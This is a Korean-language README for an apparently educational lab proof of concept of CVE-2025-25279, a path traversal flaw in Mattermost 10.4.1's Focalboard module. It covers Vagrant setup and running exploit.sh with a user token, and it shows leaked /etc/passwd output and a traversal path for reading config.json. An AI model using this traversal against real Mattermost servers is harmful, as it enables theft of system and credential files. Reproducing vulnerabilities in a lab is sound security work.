
CVE-2025-25279에 대한 개념 증명 익스플로잇, Mattermost 10.4.1의 Focalboard 모듈에 있는 경로 탐색 취약점으로, 조작된 첨부 파일을 통해 인증된 임의 파일 유출이 가능합니다.
이 개념 증명은 Mattermost 10.4.1에 영향을 미치는 CVE-2025-25279 취약점의 악용을 보여줍니다.
Focalboard(보드 관리 모듈)의 결함으로 인해 첨부 파일의 경로 탐색을 통한 임의 파일 읽기가 가능합니다.
익스플로잇은 다음을 유출할 수 있습니다:
/etc/passwd/etc/groupopt/mattermost/config/config.json)공격은 취약한 시나리오에서 인증된 사용자 계정이 있을 때만 작동합니다.
target/ 폴더는 포함되어 있지 않습니다 (GitHub에 비해 너무 큼).
수동으로 다운로드: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz
먼저 target 디렉토리로 이동하여 다음을 실행하세요:
cd target
make mattermost.box
mattermost-poc 박스가 없으면 VM이 작동하지 않으므로 확인하세요:
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box
cd live/vm1
vagrant up
VM에 접속
vagrant ssh
프로필 --> 보안 --> Personal Access Tokens
호스트 머신에서:
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip
chmod +x exploit.sh
./exploit.sh
다음이 요청됩니다:
PAT (Personal Access Token) :
👉 유효한 Mattermost 사용자의 PAT를 입력하세요.
📸 출력 예시 (/etc/passwd 유출)
===== 내용 (시작) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh
대상 파일: config.json
Mattermost의 민감한 파일을 대상으로 하려면:
exploit.sh 스크립트 상단에서 수정:
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
그러면 익스플로잇이 config.json 파일의 내용을 표시합니다.
🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril
🎬 동영상 데모
👉 전체 데모 동영상은 다음 위치에 있습니다: live/Démonstration/video-poc-cve-2025-25279.mp4
🧩 참고 사항
이 PoC는 학습 환경 전용입니다. 교육 용도 외 또는 승인 없이 사용하지 마십시오.